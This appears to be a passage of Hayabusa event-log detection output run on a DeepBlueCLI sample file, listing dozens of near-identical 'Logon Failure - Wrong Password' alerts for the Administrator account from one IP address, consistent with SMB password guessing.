Administrator | Type: 3 | Computer: iEQ6KkZEHGcSgdA8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qzxJYBbM7ZMaaGOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wO5GFBqSltNfjtQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PdsMzjfP1ZcPju2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LqpKmoCX9slPXie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ouHvw1LXTN3OSFYb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tZIB1QO7hfugceJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4QU2BQ0u5tJsdjG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0P7NKiKCmLvu6L1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4obkK4RfsLZe5gdi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRUDpDLhgop8d1el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LvdsNkFqfFWRePXJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wvd8c1jYrEZMcKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AWvECxgkvWdg9Zdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHHPOAYSMSp3BhX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rJicXUMfrx9BOzHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eybrQWvrvwSkNADJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: VVMPCaQB0XteDSwC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lbjjLoATZE6KPIQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tips954DRcYeIB2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nLe9aMiMz0akxfWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: csroGB9KZOZkb5sY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Zl4Rc25RsvJ7Y9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5CxqCFOIJBMZCD6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gVPwxpR05F3B5aXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nP317UkK2DhTD5Rd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ir3c7dqXm1LhbfqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1U1QZiJSrEufxF3b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HZnDnDhTPuC9n5A1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72gY1ClzwuisAhKW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nrneLGOZCwPIeQgT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm3gGV2yR4B3yrJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fzeklLG1KCTE5FpP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZPwxCw3EWy9NShk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: MalB3OcsOsRaMtS3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XMZMqCYPHO3n4RIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1VUeIuU1rQPISNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: md4ioB8wNiaz2EKB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nM8QaFeqwDfJZ1gc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlR75rMhpLnfQZbC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8BcOe4YUDYTXkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FK0Iiao20PyPmtTk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kQbCbAHrQilFmMZP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VUdXQOw98VVoksDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fISqpC8eKlaQGabv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s5Y0VryMAHjtB3n2 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsjAHlztFIC8tBt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiEQlAlTOhqOKpmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i7lUqZMROQXNUtQm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0eFCGEtOLzjUxI5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CqfOAGcVcwSgaeo3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 2hcqVJzkVgvUnebk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9ZpqiTGXqJlAQTZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qCzXKlJ2vPeqqdfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tITW0ihpErFk3nKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MdQqr1T4frPNlulf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: niiXRpP5AVHpG9Hu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EThR98jZUdwNxbXQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBsJcIw859FfEkLD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kG4Tv5vauSWhbj8F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 453tjgRGMu46vC33 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fnzhhfszxJWxLCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWPkeL8TnAbC1nSV | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JrDmUzyK4Xxx6Jn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMTf9D2yjumfS9LM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cCs65ithseTCORa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBrGAScjpAdScGmJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n90F99qBpmUUVLId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: MLeOkIG0hVHIOnN7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVx5uUtkaFIf7PWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kgd7lCQUQ3dHN18S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8m2MmpFVK9Uojp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0NZjeu3lb5xddVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YjjXBZnyWt0ljzpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
